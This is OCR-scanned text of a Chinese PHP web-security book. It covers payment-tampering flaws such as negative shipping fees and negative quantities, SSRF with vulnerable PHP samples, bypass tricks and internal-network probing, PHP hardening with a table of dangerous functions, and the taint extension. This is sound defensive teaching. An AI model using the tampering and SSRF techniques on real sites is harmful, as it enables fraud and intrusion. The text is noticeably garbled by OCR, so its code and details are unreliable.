在 网 上 购买 商品 时 ,根据 距离 、 所 选择 的 快递 、 附 加 的 服务 等 方面 的 因素 ， 产 生 的 运费 
有 所 不 同 ， 而 这 些 信息 都 需要 和 用 户 交 互 才能 知道 ,运费 如 果 是 前 端 提交 的 金额 ， 就 会 产生 
此 漏洞 。 


2. 运费 变更 漏洞 案例 


2013 年 3 月 ， 乌 云 网 曝光 一 个 支付 漏洞 ， 同 样 可 以 通过 此 漏洞 把 订单 金额 修改 为 1 元 
钱 。 在 该 站 点 随便 找 一 个 课程 ， 对 立即 报名 进行 抓 包 ， 会 发 现金 额 无 法 修改 。 订单 是 直接 与 
schoolid 绑 定 的， 不 过 在 配送 方式 上 却 可 以 利用 ， 因 为 配送 方式 的 金额 并 没有 经 过 验证 ， 订 
单 总 金额 只 是 简单 验证 了 课程 + 配送 运费 不 能 低 于 0， 所 以 让 其 为 正 数 即 可 绕 过 这 个 限制 ， 
修改 运费 为 负数 ， 两 者 相 加 为 正 数 才 可 以 ， 如 图 3-38 所 示 。 




















par 

















图 3-38 修改 运费 
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把 金额 设置 为 1 元 ， 如 图 3-39 所 示 。 





订单 提交 成 功 ! 请 选择 支付 方式 尽快 付款 。 
您 的 订单 号 : Ro112805772 ”应 付 金额 ; 1.00 元 
请 您 在 2 小 时 之 内 支付 ， 超 过 2 小 时 未 支付 ， 将 不 保留 您 的 预约 资格 。 





图 3-39 ”修改 金额 为 1 元 
此 订单 已 经 进入 “我 的 订单 列表 ”中 ， 如 图 3-40 所 示 。 











攻 
近 一 个 月 订单 。。 一 个 月 前 订单 二 9 
订单 编号 班级 订单 金额 下 单 时 间 。 订单 状态 操作 
全 选 【合并 支付 
011280 德 下 41_: 精 品 班 ¥1.00 未 支付 查看 支付 取消 
WE 
R0112305770 。。 熏 本 41. 1 精品 旬 ¥0.00 未 赤 付 查看 支付 职 消 
Ei 
F0112505761 。 德 本 41. 1 精品 斑 ¥80.00 未 支付 。 查看 支付 职 消 
aE 
R0112305155 。 德 河 41.1 畏 品 提 ¥1.700.00 六 赤 付 一 
8) 





WWW. Wooyun .Of :| 
图 3-40 订单 进入 列表 

3.5.5 小 结 

1. 漏洞 原因 总 结 

在 乌云 网 的 支付 漏洞 案例 中 ， 大 致 可 以 总 结 出 支付 漏洞 造成 的 原因 有 以 下 几 点 。 

(1) 支付 过 程 中 可 直接 修改 数据 包 中 的 支付 金额 

这 种 漏洞 是 支付 漏洞 中 最 常见 的 。 开 发 人 员 为 了 方便 , 在 支付 的 关键 步骤 数据 包 中 直接 
传递 需要 支付 的 金额 ， 而 这 种 金额 后 端 没有 做 校 验 ， 传 递 过 程 中 也 没有 做 签名 ， 导 致 可 以 随 
意 算 改 金额 提交 。 

(2 ) 没有 对 购买 数量 进行 限制 

产生 的 原因 是 开发 人 员 没 有 对 购买 的 数量 参数 进行 严格 的 限制 。 同 样 是 数量 的 参数 没有 


做 签名 ， 导 致 可 随意 修改 ， 经 典 的 修改 方式 是 改 成 负数 。 当 购买 的 数量 是 一 个 负数 时 ， 总 额 
的 算法 仍然 是 “购买 数量 义 单价 = 总 价 ”。 
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这 样 就 会 导致 需 支付 金额 为 负数 。 若 支付 成 功 , 则 可 能 导致 购买 到 一 We 
并 有 可 能 返还 相应 的 积分 /金币 到 你 的 账户 上 。 也 有 将 数量 改 成 一 个 超大 的 数 ， 结 果 可 能 
致 商品 数量 或 者 支付 的 金额 超过 一 定数 值 而 归 0。 


(3 ) 请 求 重复 
未 对 订单 唯一 性 进行 验证 ， 导 致 购买 商品 成 功 后 , 重复 其 中 的 请 求 ， 可 以 使 购买 的 商品 
一 直 增 加 。 


(4 ) 其 他 参数 干扰 
由 于 对 商品 价格 、 数 量 等 会 影响 最 终 金 额 的 参数 (如 运费 ) 缺乏 验证 ， 导 臻 最 终 金额 可 
被 控制 。 


2. 支付 漏洞 防御 原则 

(1) 对 传递 的 金钱 、 数 量 等 对 最 后 支付 金额 会 产生 影响 的 所 有 参数 做 签名 ， 并 且 注 意 
签名 算法 不 可 被 猜测 到 。 如 此 被 修改 过 的 数据 将 会 无 法 通过 验证 , 这 样 便 能 防止 漏洞 的 产生 。 

(2) 对 重要 的 参数 进行 校 检 和 有 效 性 验证 ， 注 意 验证 请 求 的 唯一 性 ， 防 止 重 复 攻 击 。 

(3) 只 从 客户 端 获 取 商 品 ID 和 数量 ， 对 数量 范围 进行 限制 。 对 于 接受 支付 宝 通知 的 接 
口 ， 要 对 通知 信息 进行 签名 验证 ， 并 对 支付 金额 和 订单 金额 进行 对 比 ， 且 验证 支付 订单 号 ， 
避免 重复 攻击 。 只 要 考虑 到 这 几 个 问题 ， 就 可 以 设计 一 个 比较 安全 的 支付 流程 。 


3.6 SSRF 服务 端 请 求 伪造 


SSRF (Server-Side Request Forgery， 服 务 器 端 请 求 伪造 ) 是 一 种 由 攻击 者 构造 形成 的 、 
由 服务 端 发 起 请 求 的 安全 漏洞 。 一 般 情况 下 ，SSRF 攻 击 的 目标 是 从 外 网 无 法 访问 的 内 部 系 
统 。( 正 是 因为 它 是 由 服务 端 发 起 的 , 所 以 能 够 请 求 到 与 其 相连 而 与 外 网 隔离 的 内 部 系统 。) 


3.6.1 漏洞 成 因 


SSRF 形 成 的 原因 大 都 是 由 于 服务 端 提供 了 从 其 他 服务 器 应 用 获取 数据 的 功能 且 没 有 对 
目标 地 址 做 过 滤 与 限制 。 比 如 从 指定 URL 地 址 获取 网 页 文本 内 容 、 加 载 指定 地 址 的 图 片 、 下 

为 了 更 好 地 描述 漏洞 ， 可 以 看 下 面 的 漏洞 代码 示例 : 

<?php 

让 (isset($_GET[url])){ 
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$content = file_get_contents($ GET['url]); 
S$filename =". rand() . "img-tasfa.jpg'; 
$fopen = fopen($filename, ‘wb"); 
file_ put_contents($filename, $content); 
$img = "<img src=\"" . $filename . \"/>"; 

echo $img; 

从 上 面 的 代码 中 可 以 看 出 ， 该 服务 会 从 $_GET[ur] 中 获取 一 个 地 址 ， 如 果 地 址 存在 ， 
就 读 取 该 地 址 的 内 容 ， 并 写 入 另 一 个 文件 ， 最 后 把 文件 内 容 通 过 img 标 签 返回 给 用 户 。 

从 表面 上 看 ,很 有 可 能 觉得 这 是 一 个 很 普通 的 业务 功能 ,不 过 细 想 一 下 ,如果 攻击 者 在 
$_GET["url"] 参 数 中 传 入 值 为 “/etc/password”， 此 处 代码 将 读 取 “/etc/password” 文 件 的 内 容 ， 
并 通过 img 标 签 返回 页 面 中 ， 造 成 系统 的 敏感 信息 泄露 。 

在 以 往 的 漏洞 案例 中 也 有 不 少 地 方 比较 容易 出 现 类 似 的 SSRF 漏 洞 。 下 面 列举 几 种 在 
Web 应 用 中 常见 的 从 服务 端 获取 其 他 服务 器 信息 的 功能 。 


1. 内 容 分 享 
通过 URL 地 址 分 享 网 页 内 容 ， 在 早期 分 享 应 用 中 ,为 了 更 好 地 提供 用 户 体验 ，Web 应 用 


在 分 享 功能 中 通常 会 获取 目标 URL 地 址 网 页 内 容 中 的 <tilte></title> 标 签 或 者 <meta 
name="description" content=""/> 标 签 中 content 的 文本 内 容 作 为 显示 ， 以 提供 更 好 的 用 户 体验 。 


例如 在 如 图 3-41 所 示 的 人 人 网 分 享 功能 中 ， 用 户 浏览 器 的 URL 地 址 为 http://widget.renren.com/ 


dialog/share?resourceUrl=http://www.hao123.com 。 

















3 © O |© widgetrenren conydialog/share?resourceUrl=httpy/wwwhao123com 女 | @ 


WA 人 人 网 下 本 人 人 分 享 按 由 





人 人 分 享 


全 部 好 友 自己 收藏 指定 好 友 


回去 上 
hao123_ 上 网 从 这 旦 开始 
hao123 上 网 从 这 至 开 序 











图 3-41 人 人 网 的 分 享 功能 
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其 中 “http://www.hao123.com” 为 用 户 要 分 享 的 网 址 ， 通 过 图 3-41 可 以 看 出 ， 人 人 网 获 
取 了 hao123 网 址 的 标题 、 描 述 信息 及 部 分 图 片 ， 如 果 在 此 功能 中 没有 对 URL 地 址 的 范围 进行 
限制 ， 就 会 存在 内 网 信息 泄露 的 隐患 ， 这 种 用 服务 器 来 代理 访问 的 漏洞 称 之 为 SSRF 漏 洞 。 
比如 公司 内 网 的 某 一 个 服务 本 不 应 该 对 外 访问 , 但 攻击 者 通过 一 台 可 以 对 外 访问 的 服务 器 代 
理 访问 到 了 该 服务 ， 便 产生 了 SSRF 漏 洞 。 
从 笔者 在 国内 某 漏洞 报告 平台 上 提交 的 SSRF 漏 洞 可 以 发 现 ， 包 括 淘宝 、 百 度 、 新 浪 等 
内 知名 公司 都 曾 被 发 现 过 分 享 功能 上 存在 SSRF 漏 洞 问题 。 
2. 转 码 服务 
通过 URL 地 址 把 原 地 址 的 网 页 内 容 调 优 , 使 其 适合 手机 屏幕 浏览 ,由 于 手机 屏幕 大 小 的 
关系 ， 直 接 浏览 网 页 内 容 会 造成 许多 不 便 ， 因 此 有 些 公司 提供 了 转 码 功能 ， 把 网 页 内 容 通 过 
相关 手段 转 为 适合 手机 屏幕 浏览 的 样式 。 例如 百度 、 腾讯 、 搜 狗 等 公司 都 提供 在 线 转 码 服务 ， 
而 这 些 转 码 通 常 是 服务 器 先 加 载 下 来 再 返回 给 用 户 ， 因 此 也 非常 容易 出 现 SSRF 漏 洞 。 
3. 在 线 翻译 
在 线 翻译 是 指 服务 器 通过 URL 地 址 获取 内 容 后 ,翻译 出 对 应 文本 的 内 容 返 回 给 用 户 , 这 
样 服务 器 也 必须 先 下 载 对 应 URL 地 址 的 内 容 ， 因 此 需要 控制 加 载 地 址 范围 。 


3.6.2 ”漏洞 案例 
1. 监测 中 心 SSRF 案例 
2015 年 1 月 , 白 帽子 *boooooom ”提交 漏洞 “ 某 站 SSRF 绕 过 限制 可 通 内 网 (可 shell)”。 
缺陷 编号 ，wooyun-2015-0102331 。 


白 帽子 在 应 用 检测 中 心 URL (http://developer.localhost.com/apmy/myInstant) 发 现 了 一 个 
网 站 进行 性 能 测试 的 功能 ， 于 是 对 应 用 检测 中 心 的 功能 进行 了 一 番 安 全 检测 ,在 检测 的 过 程 
中 发 现 平台 做 了 一 些 防 止 SSRF 漏洞 的 功能 ， 在 提交 URL 时 ， 应 用 检测 中 心 会 验证 域名 是 
否 会 解析 到 内 网 IP， 不 过 被 白 帽 子 发 现 了 绕 过 的 方法 。 

接着 白 帽 子 在 一 个 新 浪 SAE 的 测试 站 上 新 建 一 个 页 面 ， 在 页 面 内 写 了 一 段 JavaScript 
代码 ， 当 用 户 访问 时 就 跳 转 到 内 网 地 址 。 

检测 结果 如 图 3-42 所 示 ， 虽 然 白 帽子 提交 的 是 自己 的 SAE 站 点 域名 ,但 是 平台 检测 的 
域名 却 是 其 内 部 服务 。 




















四 
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您 的 位 置 : 我 的 监测 》http: /5.0 和 .sinaapp. con/ 监测 结果 


性 能 概况 详细 分 析 视图 分 析 图 片 优化 





截图 轮 播 视频 


http://6U sinaapp. con/ 
提示 : 拖 动 滑动 轴 以 查看 更 多 视图 





图 3-42 检测 结果 


2. SSRF 探测 内 网 案例 


2015 年 9 月 ， 白 帽子 “he1renyagao” 提 交 漏 洞 “ 某 站 SSRF 探测 内 网 ”。 

缺陷 编号 ，wooyun-2015-092052 。 

白 帽子 发 现 该 站 点 有 一 个 分 享 功能 ， 在 URL 地 址 中 发 现 有 一 个 参数 名 为 URL， 要 分 享 
的 域名 则 为 此 参数 的 值 。 如 图 3-43 所 示 ， 当 参数 值 为 www.wooyun.org 时 ， 乌 云 网 标题 被 读 
取出 来 。 





€ 3 CC D qing.blog.sinacom.cn/blog/control 


分 可 则 新 六 QinO 
WooYun or | 自 机 等 于 多 于 各 和 平台 








图 3-43 ” 读 取 出 来 的 乌云 网 标题 


白 帽子 知道 ， 如 果 地 址 可 以 访问 ， 标 题 就 会 被 读 取出 来 ， 现 在 开始 读 取 内 网 中 的 地 址 。 利 
用 URL:http:/qing.blog.localhostcom.cn/blog/controllers/share.php?url=127.0.0.Uin2xse231.Imht 对 
127.0.0.1 进行 测试 ， 如 果 127.0.0.1 的 80 端口 可 到 达 且 文件 in2xse231.Imht 不 存在 ， 就 会 出 
现 404 Not Found， 以 此 来 判断 目的 URL 地 址 是 否 存在 。 如 图 3.44 所 示 ， 显 然 这 个 文件 不 存在 。 
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€ SC (Daqing.blog.sinacom.cn/blog/controllers/share.php?url=127.0.0.1/in2xse231.Imht 


Qing me 王 录 | 注册 


分 享 到 新 浪 Qing 
404 Not Found 
x 





新 浪 Qing 会 员 登 录 
没有 帐号 ? 赶紧 免费 注册 一 个 吧 ! 


注册 新 浪 QGing 





3-44 ”检测 文件 是 否 存在 
接着 开始 扫描 内 网 IP 地 址 ， 发 现 扫描 到 10.210.75.3 的 时 候 ， 出 现 了 403 错误 ， 从 状态 
码 中 可 以 知道 此 IP 地 址 是 存在 的 ， 如 图 3-45 所 示 。 
(ellnleD 里 录 | 注册 


分 享 到 新 浪 Qing 
403 Forbidden 








图 3-45 出现 403 错误 
接着 继续 扫描 ， 扫 描 到 10.210.131.4 的 时 候 , 发 现 此 IP 是 可 以 访问 的 ， 如 图 3-46 所 示 。 


(eliaTle 量 录 | 注册 


分 享 到 新 浪 Qing 
| Test Page for Apache nstallation 








图 3-46 IP 地 址 可 访问 
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3.6.3 总 结 

1. 攻击 者 的 利用 手法 

(1) 攻击 者 可 以 对 外 网 、 内 网 、 本 地 端口 进行 扫描 ， 某 些 情 况 下 端口 的 Banner 会 回 显 
出 来 〈 比 如 3306 的 ) 。 

(2) 攻击 运行 在 内 网 或 本 地 的 有 漏洞 程序 〈 比 如 溢出 ) 。 

(3) 可 以 对 内 网 Web 应 用 进行 指纹 识别 ， 原 理 是 通过 请 求 默认 的 文件 得 到 特定 的 指纹 。 

(4) 使 用 file:/// 协 议 读 取 本 地 文件 。 

(5) 绕 过 方法 : 添加 用 户 名 http://abc@126.0.0.1， 添 加 端口 号 http://126.0.0.1:8080， 短 
地 址 跳 转 http://dwz.cn/11SMa。 


2. 防御 原则 





(1) 过 滤 返 回信 息 。 验 证 远程 服务 器 对 请 求 的 响应 是 比较 容易 的 方法 ， 如 果 Web 应 用 
是 用 来 获取 某 一 种 类 型 的 文件 ， 那么 在 把 返回 结果 展示 给 用 户 之 前 ,可 先 验 证 返回 的 信息 是 
否 符合 标准 。 

(2) 统一 错误 信息 。 避 免 用 户 可 以 根据 错误 信息 来 判断 远 端 服务 器 的 端口 状态 ， 限 制 
请 求 的 端口 为 HTTP 常 用 的 端口 ， 比 如 80、443、8080、8090; 黑 名 单 内 网 了 了 ， 避 免 应 用 被 用 
来 获取 内 网 数据 ， 攻 击 内 网 。 


(3) 禁用 不 需要 的 协议 。 仅 允许 HTTP 和 HTTPS 请 求 , 可 以 防止 类 似 于 file:///、 gopher://、 
ftp:// 等 引起 的 问题 。 
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在 Web 安 全 领域 中 , 很 大 一 批 漏洞 被 挖掘 出 来 的 原因 是 某 一 个 服务 或 组 件 配置 中 出 了 一 
些 问 题 ， 让 本 不 应 该 暴露 的 信息 暴露 到 了 攻击 者 的 视线 中 。 比 如 Apache 与 PHP 的 版 本 信息 ， 
这 些 信息 在 大 多 数 情况 下 对 于 普通 用 户 来 说 没有 什么 意义 , 但 是 对 于 攻击 者 来 说 ， 却 可 以 通 
过 版 本 信息 查 出 此 版 本 过 往 是 否 出 现 过 安全 漏洞 。 本 章 就 常见 的 LAMP 和 LNMP 环 境 介 绍 如 
何 安全 地 配置 服务 。 


4.1 PHP 安全 配置 


PHP 被 越 来 越 多 的 Web 应 用 程序 采用 ， 而 不 规范 的 PHP 安 全 配置 可 能 会 带 来 敏感 信息 泄 
露 、SQL 注 射 、 远 程 包含 等 问题 ， 规 范 的 安全 配置 可 保障 最 基本 的 安全 环境 。 本 节 重 点 介绍 
PHP 开 发 中 安全 配置 的 相关 内 容 。 

言 多 必 有 失 ， 这 句 话 在 安全 方面 也 同样 适用 ， 对 于 用 户 来 说 ， 网 站 出 现 了 哪 种 错误 或 者 
使 用 哪 种 版 本 可 能 并 不 关注 , 但 是 攻击 者 却 十 分 感 兴趣 ， 因 此 我 们 可 以 把 这 些 用 户 不 关注 的 
东西 屏蔽 掉 。 下 面 介 绍 几 个 需要 屏蔽 的 位 置 。 
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1. 屏蔽 PHP 版 本 信息 

为 了 防止 攻击 者 获取 服务 器 中 PHP 版 本 的 信息 而 导致 被 攻击 者 利用 ， 应 该 关闭 PHP 版 本 
信息 并 输出 到 HTTP 头 消息 中 ， 只 需 在 php.ini 配 置 文件 中 加 入 以 下 配置 代码 : 

expose php= Off 

当 重 启 PHP 服 务 后 ， 版 本 信息 在 HTTP 头 中 将 不 可 见 ， 此 时 攻击 者 使 用 telnet 
www.12345.com 80 是 无 法 看 到 PHP 版 本 信息 的 。 

2. 关闭 错误 回 显 

错误 回 显 一 般 用 于 开发 模式 , 但 是 很 多 应 用 在 正式 环境 中 会 忘记 关闭 此 选项 。 错误 回 显 
会 暴露 出 非常 多 的 敏感 信息 ， 为 攻击 者 下 一 步 攻 击 提供 便利 。 推 荐 关闭 此 选项 。 

使 用 如 下 配置 可 以 关闭 错误 回 显 信息 : 

display_errors = Off 

3. 错误 日 志 

在 关闭 display_errors 后 ， 在 页 面 中 无 法 看 到 错误 信息 ， 虽 然 提 升 了 安全 性 ， 但 也 增加 了 
开发 人 员 排 错 的 工作 量 ， 因 此 笔者 建议 把 错误 信息 记录 到 日 志文 件 中 ,便于 查找 服务 器 运行 
的 原因 ， 在 php.ini 中 加 入 : 

log _errors = On 

同时 ， 设 置 错误 日 志 存放 的 位 置 ， 建 议和 Apache 日 志 存 放 在 一 起 : 

error_ log = D:/usr/local/apache2/logs/php_error.log 

该 文件 必须 允许 Apache 用 户 和 组 具有 写 的 权限 。 

4. 危险 函数 

PHP 提 供 的 函数 非常 多 ， 这 样 对 于 开发 者 来 说 十 分 方便 ,不 过 有 一 些 函数 用 到 的 可 能 性 
并 不 大 ， 而 且 还 存在 安全 风险 ， 因 此 在 不 影响 业务 的 前 提 下 ， 可 以 选择 关闭 这 些 比较 危险 的 
函数 。 

5. 防止 文件 远程 加 载 漏洞 

远程 文件 包含 漏洞 在 第 2? 章 中 有 提 到 过 , 是 指 代码 加 载 了 远程 地 址 的 内 容 作 为 代码 执行 ， 
一 般 应 用 用 不 到 此 选项 ， 如 果 确 认 服务 器 不 需要 加 载 远 程 文件 ， 建 议 关 闭 此 功能 。 同 时 建议 
关闭 的 还 有 allow_url_fopen， 这 个 选项 的 作用 是 让 PHP 能 够 获取 远程 地 址 的 内 容 ， 比 如 函数 
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file_get_contents， 当 allow_url_fopen 开 启 时 就 可 以 加 载 远 程 地 址 。 在 一 些 业务 场景 中 ， 如 果 
把 file_get_contents 读 取 到 的 内 容 拼 接 到 SQL 中 ， 而 fle_get_contents 读 取 的 路 径 又 可 以 被 攻击 
者 控制 ， 就 很 容易 出 现 SQL 注 入 和 XSS 等 问题 。 


6. 限制 活动 目录 


如 果 攻击 者 上 传 了 一 个 “一 句 话 木马 ”到 网 站 运行 目录 ， 而 PHP 又 没有 限制 访问 范围 ， 
那么 结果 是 非常 糟糕 的 , 为 了 预防 此 问题 发 生 后 带 来 的 影响 , 我 们 需要 提前 使 用 open_basedir 
来 限制 PHP 只 能 操作 指定 目录 下 的 文件 。 这 个 设置 防范 文件 包含 、 目 录 志 历 等 攻击 时 非常 有 
用 ， 应 该 为 此 选项 设置 一 个 值 。 

需要 注意 的 是 ， 如 果 设 置 的 值 是 一 个 指定 的 目录 ， 就 需要 在 目录 最 后 加 上 一 个 “/”， 
否则 会 被 认为 是 目录 的 前 级 ， 如 下 设置 则 是 限制 PHP 只 能 访问 “/home/web/html/” 目 录 : 

open_basedir = /home/web/html/ 


7. 自动 转 义 


自动 转 义 是 指 开 发 者 通过 $_GET $_POST 等 全 局 变量 接收 参数 值 前 , PHP 已 经 给 参数 值 
做 好 了 转 义 ， 来 达到 让 系统 更 加 安全 的 目的 。 不 过 笔者 建议 关闭 自动 转 义 ， 因 为 它 并 不 值得 
依赖 ， 目 前 攻击 者 已 经 有 很 多 种 方法 可 以 绕 过 它 ， 甚 至 因为 GPC 自 动 转 义 的 存在 反而 衍生 出 
一 些 新 的 安全 问题 。 

XSS、SQL 注 入 等 漏洞 都 应 该 由 应 用 根据 需要 而 自行 处 理 。 同 时 , 关闭 它 还 能 提高 性 能 。 
使 用 的 配置 命令 如 下 : 

magic_ quotes gpc = Off 

全 局 变量 register_globals 

当 register_globals = ON 时 ， 变 量 是 全 局 可 用 的 ， 此 时 PHP 不 知道 变量 从 何 而 来 ， 也 容易 
出 现 一 些 变量 覆盖 的 问题 。 

因此 从 最 佳 实践 的 角度 ， 笔 者 建议 设置 register globals = OFF， 这 也 是 PHP 新 版 本 中 的 
默认 设置 。 


8. 禁用 危险 函数 


在 php.ini 配 置 文件 中 , 可 以 使 用 disable_functions 选 项 将 一 些 危险 函数 禁用 掉 ， 默 认 情 况 
下 disable_functions 是 不 禁用 任何 函数 的 , 这样 可 能 会 带 来 更 大 的 安全 风险 。 而 禁用 危险 函数 
则 是 一 把 双 刃 剑 ， 因 为 可 能 会 给 开发 带 来 不 便 ， 禁 用 的 函数 太 少 又 可 能 增加 开发 者 写 出 不 安 
全 代码 的 概率 ， 同 时 为 攻击 者 获取 WebShell 提 供 便利 。 一 般 来 说 ， 如 果 是 独立 的 应 用 环境 ， 
推荐 禁用 如 表 4-1 所 示 的 函数 。 
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表 4-1 禁用 函数 

序号 | 函数 名 功能 描述 

phpinfo0 输出 PHP 环境 信息 以 及 相关 的 模块 、Web 环境 等 信息 

这 passthru() 允许 执行 一 个 外 部 程序 并 回 显 输出 ， 类 似 于 exec0 

3 exec() 允许 执行 一 个 外 部 程序 ， 如 UNIX Shell 或 CMD 命令 等 

5 system() 允许 执行 一 个 外 部 程序 并 回 显 输出 ， 类 似 于 passthru0 

6 chroot() 可 改变 当前 PHP 进程 的 工作 根 目 录 , 仅 当 系 统 支持 CLI 模 
式 时 ，PHP 才能 工作 ， 且 该 函数 不 适用 于 Windows 系统 

scandir() 列 出 指定 路 径 中 的 文件 和 目录 

8 chgrpO) 改变 文件 或 目录 所 属 的 用 户 组 

9 | shown0 改变 文件 或 目录 的 所 有 者 

10 shell_ exec() 高 通过 Shell 执行 命令 ， 并 将 执行 结果 作为 字符 串 返 回 

11 | proc_ open0 执行 一 个 命令 并 打开 文件 指针 用 于 读 取 以 及 写 入 

2 proc_get_status() 获取 使 用 proc_open() 打 开 进 程 的 信息 

13 error_log() 在 某 些 版 本 的 PHP 中 ， 可 使 用 error_log0 绕 过 PHP safe 
mode 执行 任意 命令 

14 ini_alter() 是 ini_set0) 函 数 的 一 个 别名 函数 ， 功 能 与 ini_set0 相 同 ， 具 
体 参 见 ini_set(O) 

15 | ini set0 可 用 于 修改 、 设 置 PHP 环境 配置 参数 

16 | ini_restore() | 高 “| 可 用 于 恢复 PHP 环境 配置 参数 到 其 初始 值 

17 dl0 在 PHP 运行 过 程 中 (而 非 启动 时 ) 加 载 一 个 PHP 外 部 模块 

18 pfsockopen() 建立 一 个 Internet 或 UNIX 域 的 socket 持久 连接 

19 | syslog0 可 调用 UNIX 系统 的 系统 层 syslog0 函 数 

20 readlink() 返回 符号 连接 指向 的 目标 文件 内 容 

p41 symlink() 在 UNIX 系统 中 建立 一 个 符号 链接 

23 popenO) 可 通过 popen0) 参 数 传递 一 条 命令 , 并 执行 popen0 所 打开 的 
文件 

<] stream socket_server() 建立 一 个 Intemet 或 UNIX 服务 器 连接 

24 putenvO 用 于 在 PHP 运行 时 改变 系统 字符 集 环境 。 在 低 于 5.2.6 版 
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本 的 PHP 中 ， 利 用 该 函数 修改 系统 字符 集 环境 后 ， 可 利用 
sendmail 指令 发 送 特殊 参数 执行 系统 Shell 命令 
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Web 安 全 从 漏洞 类 型 上 可 以 分 为 两 种 ， 即 常规 漏洞 与 逻辑 漏洞 。 常 规 漏 洞 的 特点 是 每 一 
个 网 站 都 可 能 存在 此 漏洞 ， 比 如 使 用 了 数据 库 的 网 站 都 会 存在 SQL 漏洞 的 可 能 性 ;而 逻辑 漏 
洞 则 是 不 同 的 业务 所 产生 的 问题 也 不 一 样 ， 比 如 商城 网 站 存在 支付 漏洞 的 可 能 性 ， 而 门户 网 
站 没有 这 样 的 业务 逻辑 ， 则 不 会 出 现 支付 漏洞 。 

对 于 常规 漏洞 来 说 ，PHP 开 发 者 也 考虑 到 了 很 多 安全 问题 ， 比 如 以 PHP 5.4 以 前 的 GPC 
自动 转 义 为 例 ， 当 开启 GPC 自 动 转 义 之 后 , 所 有 的 参数 都 先 被 转 义 ， 此 时 从 $_GET、$_POST 
中 获取 的 数据 都 已 经 是 转 义 后 的 参数 ， 以 达到 安全 的 目的 。 不 过 很 遗憾 的 是 ，GPC 后 来 被 证 
明 作用 并 不 大 ， 攻 击 者 仍然 可 以 通过 二 次 转 义 来 绕 过 。 于 是 PHP 5.4 版 本 之 后 已 经 不 推荐 使 
用 GPC 自 动 转 义 了 。 

刚才 提 到 已 经 不 建议 使 用 GPC 了 ， 那 么 PHP 是 否 没有 好 的 全 局 性 防护 呢 ? 答案 是 否定 
的 ，2012 年 ，PHP 的 作者 之 一 鸟 哥 开发 了 一 款 PHP 的 安全 扩展 ， 可 以 从 PHP 语 言 层面 去 
分 析 ， 找 出 一 些 可 能 的 参数 注入 漏洞 代码 ， 也 就 是 本 节 中 要 介绍 的 taint。 


4.2.1 taint 简介 











PHP taint 是 一 个 用 于 检测 XSS/SQLIShell 注 入 的 PHP 扩 展 模块 ， 用 来 检查 某 些 关键 函数 
是 否 直 接 使 用 了 来 自 $ GET、$_POST、$_COOKIE 的 数据 ， 若 已 使 用 ， 则 给 出 提示 。 通 过 这 
个 特点 ， 把 taint 用 于 PHP 源 码 审计 ， 对 快速 定位 漏洞 有 帮助 。 


启用 这 个 扩展 以 后 ， 如 果 在 一 些 关 键 函 数 或 者 语句 (如 echo、print、system、exec 等 ) 
中 使 用 了 来 自 s_GET、$_POST 或 者 $_COOKIE 的 数据 ，taint 就 会 发 出 警告 。taint 发 出 警告 信 
息 的 代码 如 下 : 


<2php 

$a=$_ GET['a]; 

S$file name = /tmp' . $a; 

S$output = "Welcome, {$a} 111"; 

$var = "output"; 

$sql= "Select* from".S$a; 

$sql .= "ooxx"; 

/直接 输出 时 ， 会 给 出 警告 性 提示 

echo $output;//Warning: main(): Attempt to echo a string which might be tainted in xxx.php on line x 
/直接 打印 时 ， 会 给 出 警告 性 提示 


139 


PHP Web 安全 开发 实战 


print $$var;//Warning: main(): Attempt to print a string which might be tainted in xxx.php on line x 

/直接 加 载 文件 时 ， 会 给 出 警告 性 提示 

include($file name);//Warning: include() [function.include]: File path contains data that might be 
tainted in xxx.php on x 

/直接 放 入 SQL 语句 中 执行 ， 同 样 会 给 出 警告 性 提示 

mysql_query($sql);//Warning: mysql query() [function.mysql-query]: First argument contains data that 
might be tainted in xxx.php on line x 


4.2.2 安装 taint 
1. 安装 taint 


taint 作 为 PHP 的 一 个 扩展 ， 安 装 前 首先 需要 下 载 源 码 压缩 文件 ， 下 载 完 成 后 ， 解 压 出 源 
码 包 ， 使 用 phpsize 外 挂 该 模块 ， 最 后 执行 编译 命令 ， 安 装 过 程 如 下 。 

tar zxvf taint-2.0.4.tgz 

cd taint-2.0.4 

phpize # (如 果 找 不 到 该 命令 ， 就 需要 apt-get install php5-dev) 

.configure 

make 

make install 


2. 配置 taint 模块 

在 安装 完 taint 之 后 ， 运 行 PHP 代 码 还 不 能 看 到 taint 的 错误 提醒 ， 原 因 是 未 把 taint 加 入 到 
php.ini 配 置 文件 中 ， 所 以 还 需要 调整 php.ini 配 置 文件 ， 让 其 加 载 taint 模 块 ， 并 确保 开启 
DEPRECATED 级 别 的 错误 反馈 信息 。 

vim /usr/local/php/etc/php.ini 

增加 如 下 配置 : 


extension=/usr/local/php/ext/taint.so 
taint.enable=1 
display_errors = On 
error_reporting =E ALL & ~E DEPRECATED 
只 能 在 开发 环境 开启 该 扩展 ， 不 要 在 生产 环境 开启 ， 否 则 会 被 攻击 者 用 来 发 现 
注 意 漏 洞 o 
3. 测试 是 否 开启 


安装 和 配置 好 taint 之 后 ,测试 扩展 是 否 开启 ， 使 用 phpinfo 查 看 扩展 是 否 已 经 启用 ， 并 能 
看 到 taint 的 版 本 信息 。 步 又 如 下 : 
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人 1 使 用 vim 编辑 器 编辑 一 个 PHP 文件 . 
vim phpinfo.php 
302 在 文件 内 容 中 写 入 下 面 的 代码 : 


<?php 
phpinfo0; 


在 浏览 器 中 访问 此 文件 ， 如 http://test.localhost/phpinfo.php， 出 现 如 图 4-1 所 示 的 页 面 。 


























taint. enable 











taint. error_level 








图 4-1 表示 成 功 开 启 该 扩展 
4.2.3 测试 验证 


在 通过 phpinfo 验 证 安装 taint 成 功 后 ， 接 下 来 验证 taint 的 效果 ， 主 要 验证 SQL 注入 、 命 令 
执行 、 文 件 包含 、XSS 跨 站 、 代 码 执行 、 文 件 读 取 操 作 等 。 


1. 测试 SQL 注入 


现在 我 们 使 用 以 下 代码 来 验证 当代 码 不 过 滤 参 数 , 直接 放 到 SQL 中 ,taint 是 否 会 提醒 SQL 
注入 ， 可 以 看 到 ， 变 量 Suser 没 有 经 过 任何 转 义 或 过 滤 直 接 将 变量 拼接 到 了 SQL 语句 中 。 

<?php 

$user = $_GET['usemame']; 

$pass=$_GET[password']; 

S$pass = md5($pass); 

$qry = "SELECT * FROM ‘users’ WHERE user='$user’ AND password='$pass';"; 

$result = mysql_query($qry) or die(<pre>' . mysql_error() . '</pre>"); 

当 通 过 浏览 器 访问 此 代码 时 ， 在 浏览 器 中 出 现 如 下 警告 信息 : 


Warning: mysql_query(): SQL statement contains data that might be tainted in E:/WWW /test/low.php 
online 11 


